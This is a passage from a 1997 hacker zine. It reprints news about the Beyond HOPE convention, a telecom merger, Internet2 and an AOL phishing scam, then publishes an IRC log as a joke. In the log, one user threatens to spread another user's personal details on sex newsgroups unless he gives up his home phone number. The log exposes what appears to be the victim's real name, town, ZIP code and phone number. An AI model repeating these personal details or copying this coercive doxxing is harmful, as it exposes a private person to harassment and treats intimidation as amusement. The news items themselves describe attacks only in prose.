- nothing but spam these days," he said.
-
- Fagan says everyone involved in the situation understands the danger that the
- power being wielded could be misused. "There's a hazard any time you've got
- somebody trying to enforce standards," he said, "but these people are not
- vigilantes."
-
- Others disagree, however. Godwin said, "Unless they've been deputized, then
- this is vigilante action."
-
- ⌐1997 San Jose Mercury News
- ═───────────────────────────────────────────────────────────═
-
- Netly News - HOPE On A Rope
-
- Nothing makes hackers happier than breaking into a computer that another
- hacker set up, especially when an appreciative audience is watching. Small
- surprise, then, that there were plenty of grins at last weekend's Beyond
- HOPE hacker convention in New York City.
-
- The first break-in attempt came at about 4 a.m. on Friday when a huge,
- tattoo-encrusted Englishman named Cyberjunkie ran a utility that probed the
- network of HOPE's Dutch sister conference, Hacking In Progress. The plan: to
- expose any weaknesses, then peel away the security measures of the target
- computer like the layers of an onion. The program quickly found several
- obvious security holes. "So I had to do something," Cyberjunkie says. "It's a
- bit like waving a red flag at a bull, isn't it?" Like the encierro at
- Pamplona, Cyberjunkie sent a stampede of null information into one of the
- server's memory buffers until it choked and overloaded. Quietly attached at
- the end was a simple script that granted him the access he wanted. (In hacker
- argot, this is known as an IMAP exploit.)
-
- Because hacking is not only encouraged but rewarded at HOPE -- which
- conference organizer Emmannuel Goldstein revived this summer after a
- three-year hiatus -- each of the thousands of participants received an IP
- address with which they could glom onto the Puck Building's 10-megabit
- network and connect to the rest of the world. The Pittsburgh-based DataHaven
- Project provided 15 public terminals, but Ethernet hub plugins were
- plentiful. Confused? No problem. The 13-year-old with braces in the next
- chair was glad to help out. After all, he'd already hooked his ancient DEC,
- Hewlett-Packard or portable IBM onto the Net and was busily trying to gain
- root access.
-
- When you'd tired of chatting on IRC #hope (topic at 4:11 p.m. on Saturday:
- "HOPE is a commercial enterprise full of bull"), you could browse through the
- various kinds of phone equipment, T-shirts or software that were on sale.
- Ether Bunny sold $250 worth of lineman's equipment (including several
- Southwestern Bell hard hats) in just over an hour. There was, of course, a
- constant stream of panels to attend: Tiger Teaming (better known as security
- consulting); cryptography; how to hack Windows NT; Metrocard hacking; a
- prisoner panel that included Bernie S. and Phiber Optik; and an amazing talk
- on privacy given by investigator Steve Rambam.
-
- Best known for tracking down 161 Nazi war criminals hiding in Canada, Rambam
- is a consummate connoisseur of databases. "It is true that I can go online
- and reliably determine if you are a homosexual or a lesbian. It is true that
- I can go online and determine your religion. I can go online and, without
- breaking a sweat or getting carpal tunnel syndrome, find what movies you rent
- at Blockbuster," he said.
-
- Yet Rambam takes an unlikely stance on the privacy issue, especially in a
- room full of paranoids. Closing off databases, he says, will not adversely
- affect his work -- since he'll always be able to buy the information from
- someplace. "It will harm the ability of the average person to control their
- lives; to check up on government to see if they are lying to him, to check up
- on big business to see if they are lying to him, to check up on the guy next
- door and see if he is an ax murderer," he said.
-
- Now Rambam may be biased, for he operates a billion-record database that is
- accessible online to subscribers (he refused to give the URL for fear of
- hacking attacks). Nevertheless, it was rare to see so many teenagers taking
- copious notes, noted fellow attendee Shabbir Safdar. The audience couldn't
- get enough of Rambam, who looked more like a fed than a hacker in his
- custom-made Hong Kong suit. (A big hit was when he detailed how to turn a
- dead man's identity into your own.) But ultimately, Rambam questioned why
- anyone would want to: "The fact of the matter is that there is no real reason
- to hide most of who you are and what you do."
-
- It's an unfortunate but true statement about the state of hacking today.
- Where have all the good hacks gone? Three years later and the flimsy
- Metrocard is still impenetrable. A panel of hackers turned security
- consultants showed that one of the biggest challenges for today's data
- cowboys was changing the preconceived notions of hackers held by the
- corporations they work for.
-
- Keynote speaker Brock Meeks, went so far as to admonish the crowd for their
- low hacker batting average (only 20 percent of all government computer
- systems have been hacked). His address was putatively a history of hacking in
- America, but it sounded more like a call to arms for the audience. "You're
- going to have to learn how to hack the media, because you haven't been doing
- a good job of it," Meeks said.
-
- Indeed, hackers get their share of bad press, and they gripe about it to no
- end. And HOPE highlighted the split personality hackers bring to their
- relationship with the media. Like most groups, they lambaste journalists. Yet
- their keynote speaker wasn't an agent provocateur, but a member of the press
- (albeit an esteemed one who champions the hacker cause). There was a panel
- discussion (which I participated in) where hackers could finally turn the
- tables on the media in attendance. "No weapons allowed," said the schedule of
- events. Yet only one of the audience's questions criticized the press,
- specifically noting John Markoff and his book on Kevin Mitnick. There was
- even a "Media Portrayal of Hackers" survey being distributed by a University
- of Tennessee sociology student as part of his master's thesis.
-
- Perhaps it's useless to analyze hacker-vs.-media steretypes. After all, the
- hacker community has shown that it can successfully run its own magazines,
- pirate radio stations and web sites. If it's true that information technology
- is going to obliterate old media, the horsemen of the apocalypse are more
- likely riding from alt.2600 than from Wired. "The whole 2600 thing is a media
- hack," admitted Goldstein. And the success of this year's HOPE showed not
- only that Goldstein knows how to co-opt the media but that he might be a damn
- good entrepreneur as well.
-
- ⌐1997 CNN
- ═───────────────────────────────────────────────────────────═
-
- Bell Atlantic-Nynex Merger Gets Final OK
- (08/14/97)
- By Kora McNaughton, TechInvestor
-
- WASHINGTON -- The Federal Communications Commission Thursday approved the
- merger of Nynex and Bell Atlantic, creating the second-largest phone company
- in the United States.
-
- Although the FCC's blessing was not altogether unexpected, Wall Street
- welcomed the news, pushing both companies' stock up after the late afternoon
- announcement. Bell Atlantic [BEL] gained 1 1/4 to close at 75 15/16; Nynex
- [NYN] closed up 1 1/8 at 58 1/16.
-
- Last month, after the two companies proposed conditions designed to promote
- competition in their markets, the agency's chairman, Reed Hundt said he was
- ready to approve the deal. Hundt stumped for a new telecommunications law on
- Thursday.
-
- In a joint announcement, Nynex and Bell Atlantic said they are "pleased" that
- the agency unanimously agreed to the merger, which will close "as soon as
- possible."
-
- The $23 billion merger, first announced in April of 1996, will create a phone
- company with a presence in markets covering most of the Eastern seaboard,
- serving 40 million phone access lines and 5.5 million wireless customers. It
- will be headquartered in New York.
-
- Since the merger was announced, Bell Atlantic and Nynex have been dancing
- with regulators on both the Federal and local levels.
-
- Commissioner Rachelle B. Chong said in a statement Thursday the FCC approved
- the deal "only after a very careful analysis of the likely market effects of
- the merger, and the imposition of certain enforceable pro-competitive
- conditions to help ensure that the local network is opened -- and stays
- opened -- to new competitors."
-
- The conditions include providing detailed performance reports to competitors
- and regulators, offering interconnection, network element, transport, and
- termination at rates based on forward-looking economic costs, and offering
- shared transport priced by the minute and routed just as Bell Atlantic's own
- traffic, without access charges.
-
- Bell Atlantic and Nynex proposed the conditions July 19, one day after the
- Eighth U.S. Circuit Court in St. Louis ruled that the FCC had exceeded its
- authority by trying to set the prices new entrants will pay for access to
- local phone networks. The Baby Bells built the networks, but now must share
- them with competitors.
-
- Long-distance companies such as AT&T and MCI have accused the RBOCs of
- delaying required upgrades to the local networks to allow for competition;
- earlier this week, MCI complained Nynex was taking too long to process orders
- for MCI local service in New York, thereby slowing MCI's growth in that
- region.
-
- In a statement after the ruling Thursday, MCI Chief Policy Counsel Jonathan
- Sallet praised the FCC. "The conditions that have been announced today and
- that will be enforced by the FCC will help to alleviate the anticompetitive
- impact of the Bell Atlantic-Nynex merger," he said.
-
- ⌐CMP Media, 1996.
- ═───────────────────────────────────────────────────────────═
-
- Getting Ready For Internet2
- (08/18/97)
- By Larry Lange, Electronics Engineering Times
-
- ANN ARBOR, Mich. -- The effort to build Internet2--an academic and
- government research-only network separate from the increasingly
- commercialized Internet--is kicking into high gear following a series of
- technical meetings this summer.
-
- The effort is rapidly picking up participants from universities that want to
- log on to the proposed high-speed, multimedia-oriented network. And
- communications OEMs are eyeing Internet2 as an ideal test bed for their
- next-generation systems.
-
- Having completed a critical technical workshop here early this month and one
- in July in Denver, the Internet2 organization is pushing to meet its
- self-imposed deadlines for bringing its network live by year's end, with
- three university members to be connected as early as this month.
-
- The network promises benefits for commercial as well as academic Internet
- users. Obviously, offloading institutional traffic from the commercial
- Internet will speed transmissions for both Internet and Internet2 users.
-
- But the "I2" will also "speed the development of new network features and
- functionality," said Charles Lee, senior manager of Internet2 interests for
- MCI Communications Inc. Those features and functions "could then be
- incorporated into the commercial Internet," Lee said.
-
- The work is coming at a time when the underlying base technology of the
- Internet Protocol is being pulled in many directions. In this environment,
- communications OEMs are eager for a safe haven to test out future
- technologies.
-
- "Internet2 will provide a large-scale environment to try out new ideas and
- equipment running at speeds faster than any in operation with an intellectual
- community of users," said Stephen Wolff, director of business development for
- Cisco Systems Inc., a participant in the project.
-
- The Internet2 organization has grown from 34 members at its October inception
- to more than 100 research universities today. Notable government
- representatives hail from the U.S. Department of Energy and the National
- Science Foundation (NSF, Arlington, Va.). Several members are already
- engineering prototype network facilities, with the project's initial
- operations expected to begin by year's end.
-
- "We originally thought only 20 to 30 of the major research universities had
- such a high priority for continuing to build their network infrastructure
- that they would join the project," said Internet2 director Mike Roberts of
- Educom, a consortium of universities that promotes the use of information
- technology in education and research. "Obviously, we were wrong."
-
- So far, Internet2 university members have committed up to $50 million per
- year in new funding for the project, and the commercial sector--with project
- representation from such companies as Cisco, Lucent Technologies, Sun
- Microsystems, IBM, AT&T and Microsoft--has pledged more than $5 million. By
- contributing funding to university partners, the corporations can tap the
- project as a testbed for unproven Internet technologies--a task that's
- difficult to undertake on today's overcrowded Internet.
-
- Internet2 organizers are working with representatives from IBM, MCI, Cisco
- and other internetworking companies to discuss the needs of the system
- architects developing the advanced Internet2 nodes called Gigapops (points of
- presence)--the network aggregation points for the second-generation Internet
- wide-area network.
-
- Ted Hanss, director of applications development for the Internet2 project,
- told EE Times that such applications-enabling technologies as security,
- multicast and quality of service were among the important topics discussed at
- the summer meetings. The applications heading the list for I2 are
- collaborative environments, digital libraries, tele-immersion, tele-medicine
- and distance-independent instruction, Hanss said.
-
- Internet2 engineers have officially settled on an architecture of
- connectivity through Gigapops, which can swiftly connect the campuses, labs
- and, later, the urban-area and state/regional networks envisioned by the
- Clinton administration's Next-Generation Internet (NGI) initiative.
-
- Accordingly, Internet2 engineers look to deliver 622-Mbit/second
- transmissions to three supercomputer centers, running the Internet Protocol
- (IP) over an asynchronous-transfer-mode (ATM) network. And they want to boost
- bandwidth by nearly 14 percent for the University of Illinois National Center
- for Supercomputer Applications (NCSA), the San Diego Supercomputer Center and
- the Pittsburgh Supercomputer Center, with the promise of 20 more universities
- to be linked by this fall to Gigapops that will deliver data at speeds of at
- least 155 Mbits/s. (Current commercial transmission speeds top out at 45
- Mbits/s.)
-
- Other Internet2 project members have laid the foundations for connectivity to
- the network based on its anticipated speeds. A group of universities in
- California recently announced the building of an Internet2 network that will
- be designed to connect campuses at speeds of over 600 Mbits/s.
-
- "The electronic highway is faced with rush-hour traffic most of the day. We
- need reliable service delivery," said M. Stuart Lynn, associate vice
- president at the University of California and the principal investigator for
- the project.
-
- The participating schools include seven campuses of the University of
- California, along with the California Institute of Technology, California
- State University, Stanford University and the University of Southern
- California. Notable goals for the project will be the formation of a virtual
- university in which students can view publications from distant libraries and
- take classes located at other campuses.
-
- Internet2 is systematically swallowing up the National Science Foundation's
- Very High-Performance Backbone Network Service (vBNS). More than 50 Internet2
- institutions have received competitively awarded vBNS grants under the NSF's
- High Performance Connections program.
-
- In fact, vBNS could be considered the heart of Internet2, or at least its
- substantive launchpad. Begun in 1995, with an investment of $50 million under
- a five-year cooperative project with MCI, the service links six NSF
- supercomputer centers and was initially implemented to design and support
- "gigabit testbeds" for R&D of advanced networking technologies. The centers
- are located at the Cornell Theory Center, at NCSA and elsewhere.
-
- Those technologies included ATM/Sonet, the interfacing of ATM to the High
- Performance Parallel Interface and HiPPI switches, and all-optical
- networking. Each testbed addressed an application that required gigabit-speed
- networks.
-
- The trunk-line infrastructure for true broadband services to academia is
- being defined at a time when the core protocols for the Internet are being
- upgraded from the original transport and network protocols developed by the
- Advanced Research Projects Agency (now Darpa) in the 1980s.
-
- NSF program director Mark Luker said many of the problems restricting the
- commercialization of the original Internet "should be solved within the next
- few years using Internet2." Once traditional not-for-profit users move to the
- new network, Luker said, "it will be easier to implement pay schemes and give
- incentives to finance further Internet growth."
-
- Luker's comments underscore one of the motivations behind the
- administration's NGI initiative: relieving the current Internet's bandwidth
- bottlenecks.
-
- "This is an ongoing proposition. It won't stop with Internet2. I see an
- Internet3 and 4 in the near future," Luker said. By the end of 1998,
- Internet2 looks to have nearly all participating universities employing
- stable Internet2 connections.
-
- Projects under development with Internet2, Luker said, include digital
- multimedia libraries accessible in virtual reality, enhanced collaborative
- workplace communities with live digital video feeds, videoconferencing,
- collaborative computer-integrated manufacturing, weather forecasting and
- military-troop-movement monitoring.
-
- A briefing on Internet2 by the NASA Ames Research Center at Moffett Field
- (Mountain View, Calif.) drew more than 60 companies. "Although much of the
- research needed to make a new, superfast Internet is too risky and long-term
- for the private sector, our success will depend on partnerships with private
- industry and universities," Christine Falsetti, NGI project manager at Ames,
- said.
-
- NASA recently designated Ames the lead institution for the agency's $30
- million portion of a three-year, $300 million federal project to develop the
- NGI. "We want a network for researchers that is fast from end to end. And we
- will work with private companies on routers, switchers and computer
- workstations that will send computer information much faster than today's
- machines can send it," Falsetti said.
-
- One NASA goal is to create "co-laboratories" by linking labs, computers,
- databases and scientists from around the world via I2. Ames is organizing a
- September workshop for companies interested in such emerging applications.
-
- The NGI initiative was unveiled in October with three basic goals: to connect
- universities and national labs with high-speed networks that would be 100 to
- 1,000 times faster than the commercial Internet; to promote experimentation
- with advanced multimedia technologies, such as real-time videoconferencing;
- and to demonstrate new applications that support scientific research,
- national security, distance education, environmental monitoring and health
- care.
-
- On the campaign trail, the Clinton administration promised $100 million in
- funding for its initiative. The funds are set for release in January.
-
- Internet2 spokesmen are quick to say that the network is not designed to
- replace the existing public Internet or to sidestep the NGI initiative. "The
- goals of Internet2 and of the NGI are entirely compatible and complementary,"
- said Douglas Van Houweling, vice chairman of Internet2. "There is a
- compelling unanimity of purpose and direction."
-
- Yet Internet2 is not without its critics. There have been suggestions, for
- instance, that universities are leveraging the project to maintain a separate
- network presence.
-
- But Internet2 Steering Committee member Raman Khanna disputed that assertion.
- "At Stanford, where I work, only 15 percent of Internet traffic goes toward
- other universities," Khanna said. "The other 85 percent connects the school
- to the rest of the commercial network. Even if academia were to isolate its
- future, high-speed network system, it would speed up only 15 percent of its
- Internet traffic."
-
- Khanna also noted that the high-speed network is merely for the development
- of advanced applications and that any advances made will be available to all
- Internet users in three to five years.
-
- Another point of controversy is the government's role in funding specific
- university projects though Internet2. Several high-level lawmakers complained
- at recent Senate hearings that the NGI program favors urban areas and large
- universities.
-
- But Neal Lane, director of the National Science Foundation, said that
- Internet2 "is not an established infrastructure like a highway. It is a work
- in progress . . . and it is experimental.
-
- "That is the reason we need the nation's researchers to help us move
- forward."
-
- It remains to be seen whether the Internet2 body can pull off its monumental
- project and then seamlessly bring the network into line with the commercial
- Internet and provide bandwidth and multimedia solutions for the NGI, all by
- the slated deadline of 2000. If it can, the project will look to realize even
- more impressive goals.
-
- Internet2 plans to share discoveries with others in education worldwide.
- "This is the approach that characterized the first Internet," said NSF's
- Luker, "and it can work again with Internet2."
-
- ⌐CMP Media, 1996.
- ═───────────────────────────────────────────────────────────═
-
- AOL urges its members to protect themselves
- August 26, 1997
- By Franklin Paul
-
- NEW YORK (Reuter) - America Online Inc.'s subscribers can do as much, if not
- more than the company can, to protect themselves from online theft and
- fraud, a company executive said Tuesday following a recent scam.
-
- The world's largest online service says smart members can do more to keep
- their personal information private than could any protective software program
- or lurking online police.
-
- "If you want to protect yourself, you need to protect your personal
- information," Tatiana Gau, AOL's vice president of integrity assurance, said
- in an interview.
-
- "We have a three-pronged approach; to educate, empower and enforce, where we
- put the tools in the hands of our members to allow them to protect
- themselves," against those who would take personal information to commit
- crimes like credit card fraud, she said.
-
- The approach includes frequently reminding the service's more than 8 million
- members that AOL staff members will never ask for password or billing
- information, and telling them where to go to report a scam in action.
-
- "People are beginning to realize that the same kind of scams that occur in
- real life do occur online," Gau said. "So in the same way in real life you
- would never dream of giving out your PIN number to your ATM card, you
- shoudn't be doing it online either."
-
- Earlier this month, a scam was perpetrated on AOL whereby members received
- electronic mail that invited them to jump to a Web page which contained text
- of a letter from AOL Chairman Steve Case.
-
- From there, another link asked members to enter billing information. Thinking
- they were providing data to AOL, they were really handing their vital
- information to thieves.
-
- While Gau would not say how many members were duped by the scam, or if the
- perpetrators were caught, she said it was other AOL members that fingered the
- crooks.
-
- "It was literally within a matter of hours of the mail being sent out that
- the e-mail was forwarded to us, which allowed us to very quickly get the site
- shut down," she said.
-
- "The billing scam ... is really testimony to the fact that our ... mechanisms
- are working," she said.
-
- She adds that the company's other security measures include adding alerts to
- the first screen that members see when they sign on and putting e-mail with
- safety tips in the mailboxes of new members.
-
- AOL also urges members not to download files from sources they are unfamiliar
- with and it makes available free anti-virus software.
-
- AOL's stock fell $1 to close at $66 on the New York Stock Exchange.
-
- ⌐Reuters Ltd.
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌──────────────────────────────────────┐
- │ Logs - Yaaay! It's IRC!!! │
- └──────────────────────────────────────┘
-
- discore messing around with that always lame ZeR0-HeX:
-
- Session Start: Mon Aug 18 01:31:53 1997
- [1:31] <ZeR0-HeX> you're bullshitting
- [1:31] <ZeR0-HeX> you don't know shit
- [1:32] <ZeR0-HeX> if you really do know my phone number
- [1:32] <ZeR0-HeX> tell it to me
- <discore> ok!
- Session Close: Mon Aug 18 01:33:16 1997
-
- Session Start: Mon Aug 18 01:33:17 1997
- [1:33] <ZeR0-HeX> may i ask where you received this information from?
- <discore> my ereet hackmobile.
- [1:33] <ZeR0-HeX> come on
- [1:33] <ZeR0-HeX> i just wanna know
- <discore> sorry tootsies, no can do
- [1:33] <ZeR0-HeX> turn ur away message off!!!!!!!11
- <discore> hmmm, whats yer phone #, i dont feel like calling the operator
- [1:34] <ZeR0-HeX> alright
- [1:34] <ZeR0-HeX> well
- [1:34] <ZeR0-HeX> i believe ya
- <discore> teehee
- <discore> elite!
- <discore> so
- [1:35] <ZeR0-HeX> what do you intend to do with this information? i have done nothing wrong to
- you. so please don't do anything bad
- <discore> why did ya copy phrack?
- [1:35] <ZeR0-HeX> oh
- <discore> thats not very nice you know
- [1:35] <ZeR0-HeX> so this is what it's about
- [1:35] <ZeR0-HeX> ok
- [1:35] <ZeR0-HeX> i'll explain
- [1:35] <ZeR0-HeX> but
- [1:35] <ZeR0-HeX> you gotta promise not give my info out to anyone
- [1:35] <ZeR0-HeX> ok?
- <discore> teehee
- <discore> over 14,000 ppl have it
- [1:36] <ZeR0-HeX> who?
- <discore> woot
- <discore> tell me why
- <discore> i want to kn0w
- [1:36] <ZeR0-HeX> wait
- [1:36] <ZeR0-HeX> i'll tell you
- [1:36] <ZeR0-HeX> but 1st
- [1:36] <ZeR0-HeX> you gotta tell me where you got the info from
- [1:36] <ZeR0-HeX> and you gotta tell me who the 14000 people are
- [1:36] <ZeR0-HeX> and how theygot it
- <discore> hmm, i dont know all the names of the 14,000 ppl
- <discore> but i will check it!
- <discore> ill make ya a deal, ok?
- [1:37] <ZeR0-HeX> how the hell did 14000 people get it?
- <discore> wanna deal?
- [1:37] <ZeR0-HeX> sure
- <discore> oK!
- [1:37] * ZeR0-HeX listening
- [1:37] <ZeR0-HeX> ???
- <discore> tell me a real phone # of your house, and i will tell you what you want to know, if
- the phone # is fake-o then inphoz get posted on alt.sex.*
- [1:38] <ZeR0-HeX> why do you want my phone number?
- [1:38] <ZeR0-HeX> so you can give it to the 14,000 people
- [1:38] <ZeR0-HeX> nice try
- <discore> cause im too lazy to call the operator
- [1:38] <ZeR0-HeX> then you can bullshit me after
- <discore> no actually i keep files on ppl
- <discore> heh
- <discore> and like, i just want it for personall use
- <discore> i wont play with ya
- [1:38] <ZeR0-HeX> who the fuck are you??
- <discore> dont worry, i could still get it through other ways than you
- [1:38] <ZeR0-HeX> why do you have my info???
- <discore> im discore!
- [1:39] <ZeR0-HeX> oh man..
- <discore> thats what our deal is about buddy
- <discore> its a fair trade
- [1:39] <ZeR0-HeX> jeez, you're something :-)
- [1:39] <ZeR0-HeX> what info do i want1!!
- [1:39] <ZeR0-HeX> the only thing i want
- [1:39] <ZeR0-HeX> is to not let the 14,000 people know
- [1:39] <ZeR0-HeX> listen
- [1:39] <ZeR0-HeX> if you were really a hacker
- [1:40] <ZeR0-HeX> you would have known my number
- <discore> well, you are right
- <discore> BUT im lazy and bored tonight so you are my project
- [1:41] <ZeR0-HeX> ok
- [1:41] <ZeR0-HeX> if i give you my phone number
- [1:41] <ZeR0-HeX> what would i get back in return
- [1:41] <ZeR0-HeX> ABSOLUTELY SHIT
- <discore> whatever you want out of me, sex or anything!
- [1:41] <ZeR0-HeX> i still can't stop the 14000 people
- [1:41] <ZeR0-HeX> lol
- [1:41] <ZeR0-HeX> hehe
- <discore> so
- <discore> wanna do that?
- [1:42] <ZeR0-HeX> ok
- [1:42] <ZeR0-HeX> but wait
- [1:42] <ZeR0-HeX> i'll giva ya my number
- <discore> K!
- [1:42] <ZeR0-HeX> but
- [1:42] <ZeR0-HeX> what are you gonna tell me?
- <discore> how the ppl got it, where they got it and why it was made public.
- [1:42] <ZeR0-HeX> hmmm
- [1:42] <ZeR0-HeX> ok
- [1:42] <ZeR0-HeX> but
- [1:43] <ZeR0-HeX> wait
- [1:43] <ZeR0-HeX> after i give you the numer
- [1:43] <ZeR0-HeX> number
- [1:43] <ZeR0-HeX> you can't tell anyone it
- [1:43] <ZeR0-HeX> ok?
- <discore> i know!
- [1:43] <ZeR0-HeX> no
- [1:43] <ZeR0-HeX> don't bullshit me
- <discore> why would i bullshit you?
- [1:43] <ZeR0-HeX> this is serious shit
- <discore> im getting something.
- [1:43] <ZeR0-HeX> ok
- [1:43] <ZeR0-HeX> dont tell anyone
- [1:43] <ZeR0-HeX> ok
- <discore> k..
- [1:43] <ZeR0-HeX> fine
- [1:43] <ZeR0-HeX> you go 1st
- [1:43] <ZeR0-HeX> with the info
- <discore> bahahaha
- [1:43] <ZeR0-HeX> then i'll go
- <discore> nein, cause i have something that is more important to you.
- [1:44] <ZeR0-HeX> obviously i'll tell you the number!! i dont want my address and name posted
- up everywhere in the internet
- [1:44] <ZeR0-HeX> alright
- [1:44] <ZeR0-HeX> alright
- [1:44] <ZeR0-HeX> 860
- [1:44] <ZeR0-HeX> 875
- [1:44] <ZeR0-HeX> 2117
- <discore> well teehee, i dont trust you, but you shouldnt trust me but im in control.
- [1:44] <ZeR0-HeX> there
- [1:44] <ZeR0-HeX> gimme a call tomorrow
- [1:44] <ZeR0-HeX> :-)
- [1:44] <ZeR0-HeX> ok
- <discore> lemme look for a sec to verify
- [1:44] <ZeR0-HeX> now can i have the info please?
- [1:44] <ZeR0-HeX> ok
- [1:44] <ZeR0-HeX> wait
- [1:44] <ZeR0-HeX> hey
- [1:44] <ZeR0-HeX> go to www.yahoo.com
- [1:44] <ZeR0-HeX> go to people search
- [1:45] <ZeR0-HeX> type in mumtaz alam
- [1:45] <ZeR0-HeX> ellington, ct 06029
- [1:45] <ZeR0-HeX> there, made it ez fer ya
- <discore> extremly
- <discore> i used yp.uswest.com
- <discore> but thats ok!
- <discore> now what you wanna know?
- [1:45] <ZeR0-HeX> ok
- [1:45] <ZeR0-HeX> the public crap?
- [1:46] <ZeR0-HeX> how the 14000 people got it
- [1:46] <ZeR0-HeX> etc.
- [1:46] <ZeR0-HeX> how you got it
- [1:46] <ZeR0-HeX> etc.
- <discore> well, there is a land called #phreak
- <discore> they owned you recently
- [1:46] <ZeR0-HeX> grrrrrr
- [1:46] <ZeR0-HeX> and....
- <discore> well its not our fault you used your real name in email headers
- [1:46] <ZeR0-HeX> what???
- <discore> and ppl spread shit.
- [1:46] <ZeR0-HeX> which one/?
- [1:46] <ZeR0-HeX> not zer0-hex
- [1:46] <ZeR0-HeX> what e-mail headers?
- <discore> teehee
- <discore> in your emails
- <discore> it has your real name
- <discore> aol does it by defult
- <discore> :)
- [1:47] <ZeR0-HeX> i use zer0-hex@juno.com
- [1:47] <ZeR0-HeX> how did they get faraz outta that
- [1:47] <ZeR0-HeX> huh?
- <discore> well, heh, thats how we got it!
- [1:47] <ZeR0-HeX> what has it?
- [1:47] <ZeR0-HeX> where?
- [1:47] <ZeR0-HeX> where????
- <discore> settle young child of the force
- [1:48] <ZeR0-HeX> well?
- [1:48] <ZeR0-HeX> sometime today would be nice?
- [1:48] <ZeR0-HeX> i'd like to get some sleep
- <discore> i dont understand the question.
- [1:48] <ZeR0-HeX> what e-mail header?
- [1:48] <ZeR0-HeX> what about aol?
- [1:48] <ZeR0-HeX> i dont have aol
- <discore> well it seems you sent some mail from aol that contained your real name
- [1:48] <ZeR0-HeX> huh?
- [1:48] <ZeR0-HeX> where?
- <discore> and that went public cause no one was hapy with you for copying phrack
- [1:48] <ZeR0-HeX> when?
- <discore> i dunno
- <discore> geeze
- <discore> im not god
- [1:49] <ZeR0-HeX> i thought you had the answers
- [1:49] <ZeR0-HeX> !!!
- [1:49] <ZeR0-HeX> ok
- [1:49] <ZeR0-HeX> now how did it get public?
- [1:49] <ZeR0-HeX> and how did 14000 people get it?
- <discore> ppl spread inphoz fastly in the hightech society we live in
- <discore> well
- <discore> not 1400
- <discore> not 14000
- <discore> i exaggeratted
- [1:49] <ZeR0-HeX> but why would 14000 people want it?
- <discore> for educational purposes
- [1:49] <ZeR0-HeX> jeez
- [1:50] <ZeR0-HeX> is uh
- [1:50] <ZeR0-HeX> anyone gonna send me a bomb?
- [1:50] <ZeR0-HeX> :-)
- [1:50] <ZeR0-HeX> or gimme a 1000 prank calls
- <discore> i hope not for your sake.
- <discore> have you got anything yet?
- <discore> trust me, the ppl who got these infoz could easily get your phone #, i just did it
- first. teehee
- [1:51] <ZeR0-HeX> what do you mean, have i got anything?
- <discore> have you got any prank calls or any bombs or anything fun?
- [1:51] <ZeR0-HeX> no
- [1:51] <ZeR0-HeX> not yet..
- [1:51] <ZeR0-HeX> :-)
- [1:51] <ZeR0-HeX> hehe
- <discore> then you wont
- [1:51] <ZeR0-HeX> ok
- <discore> ppl got your infoz because they were bored
- [1:51] <ZeR0-HeX> so uh
- [1:51] <ZeR0-HeX> ok
- [1:51] <ZeR0-HeX> now...
- <discore> not cause they wanted to shut off your phones
- [1:51] <ZeR0-HeX> ok
- [1:52] <ZeR0-HeX> ok
- [1:52] <ZeR0-HeX> ok
- [1:52] <ZeR0-HeX> now about phrack
- <discore> so they wont do shit with them
- [1:52] <ZeR0-HeX> listen
- [1:52] <ZeR0-HeX> ok
- [1:52] <ZeR0-HeX> are you listening?
- <discore> yes, i always am.
- [1:52] <ZeR0-HeX> ok
- [1:52] <ZeR0-HeX> um
- [1:52] <ZeR0-HeX> i think i made it in late 96
- [1:52] <ZeR0-HeX> now lissen
- [1:52] <ZeR0-HeX> i went to a web site
- [1:52] <ZeR0-HeX> and i found a mcdonald's thingie
- [1:53] <ZeR0-HeX> I SWEAR TO GOD IT HAD nothing on it that sed phrack
- [1:53] <ZeR0-HeX> i swear
- [1:53] <ZeR0-HeX> i ain't lying
- [1:53] <ZeR0-HeX> wait
- [1:53] <ZeR0-HeX> do you want me to say this shit in phreak?
- <discore> sure!
- Session Close: Mon Aug 18 01:53:34 1997
-
- Session Start: Mon Aug 18 01:53:35 1997
- [1:53] <ZeR0-HeX> so people will stop bugging me?
- [1:53] <ZeR0-HeX> k
- Session Close: Mon Aug 18 01:53:39 1997
-
- Session Start: Mon Aug 18 01:54:29 1997
- [1:54] <ZeR0-HeX> like i was saying
- Session Close: Mon Aug 18 01:54:34 1997
-
- Session Start: Mon Aug 18 02:02:33 1997
- [2:02] <ZeR0-HeX> ello?
- Session Close: Mon Aug 18 02:02:54 1997
-
- Session Start: Mon Aug 18 02:04:33 1997
- [2:04] <ZeR0-HeX> HY!!!!!!
- [2:04] <ZeR0-HeX> HEY!!!!
- [2:04] <ZeR0-HeX> WAKE THE FUCK UP!!!!
- Session Close: Mon Aug 18 02:06:12 1997
-
- ═────────────────────────────────────────────────────────────────────────────═
- ┌--──────────────────────┐ ┌--──────────────────────┐
- : Havoc Bell Systems │ : Acknowledgements │
- ·-──-────────────────────┘ ·-──-────────────────────┘
- ArcAngl : Military boy |Banshee| : brought kOS to thtj.com
- Keystroke : Submissions Editor ghost : kills cops
- KungFuFox : Newsboy g-line : hates cops
- lurk3r : Freed! k1llah : likes cops
- memor : Ueberleet French phreak Modify : met RATM and WuTang
- REality : #phreak's bot Own3r shamrock : is pheared by his dad
- Scud-O : Hates Wal-Mart shoelace : smartass 3/4 of the time
- UnaBomber : Obsessed with streetbikes wyclef : loves cops
-
- ┌--────────────┐
- : channels │
- ·-──-──────────┘
- #phreak : Home Sweet Home
- #sin : SIN Home
- #hackphreak : cool channel
-
- ═────────────────────────────────────────────────────────────────────────────═
- Issue 15 is out October 1st!
-
- Send all articles for issue 15 to Keystroke at: keystroke@thepentagon.com
- Editor's note: The above strong suggestion is not a joke!
-
- ┌--───────────────────────┐
- : - End of Communique - │
- ·-──-─────────────────────┘
-